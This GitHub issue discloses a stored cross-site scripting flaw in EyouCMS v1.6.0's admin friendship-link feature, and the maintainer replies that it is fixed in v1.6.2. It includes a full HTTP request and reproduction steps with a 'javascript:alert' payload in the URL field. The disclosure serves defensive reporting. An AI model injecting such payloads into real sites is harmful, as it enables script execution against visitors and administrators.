### ISSUE TITLE
EyouCMS v1.6.0 existence stored cross-site scripting (XSS)

### ISSUE THREAD

**Issue by Zoe0427** [weng-xianhu/eyoucms#32]
name：EyouCMS
version: EyouCMS-V1.6.0-UTF8-SP1
Installation package [download：](https://www.eyoucms.com/rizhi/2022/1102/28642.html)
![image](https://user-images.githubusercontent.com/75592724/201087069-82587b7d-1043-4568-a3f8-72bc315b581d.png)

Problematic packets:

> POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1
> Host: 192.168.23.130:49160
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
> Accept: application/json, text/javascript, */*; q=0.01
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> X-Requested-With: XMLHttpRequest
> Content-Length: 141
> Origin: http://192.168.23.130:49160
> Connection: close
> Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload=
> 
> typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=

Vulnerability recurrence

1.Log in to the background，Click "SEO module" ->"friendship link" ->"add link"
![image](https://user-images.githubusercontent.com/75592724/201087868-9e277a70-d1c7-4279-9ef0-cb3907fa28fd.png)

2.input payload：javascript:alert(11)，Submit
![image](https://user-images.githubusercontent.com/75592724/201088874-80075e5d-b129-4f83-b024-10b400d11ad8.png)
Click and trigger XSS after submission
![image](https://user-images.githubusercontent.com/75592724/201088329-58f0e3d5-de78-4d2e-ada9-9764568c213c.png)
![image](https://user-images.githubusercontent.com/75592724/201088593-49114a42-0c28-47bc-ab5b-40eb0896515d.png)

PS：The vulnerability will also be displayed on the home page and can be triggered by clicking
![image](https://user-images.githubusercontent.com/75592724/201089236-82584e4f-ad5f-43b8-90f4-4157984f78b4.png)
![image](https://user-images.githubusercontent.com/75592724/201089301-e1d3b09e-4b69-4e92-b27c-22918f04a68e.png)

**Comment by weng-xianhu** [comment]
已修复，在v1.6.2版本发布
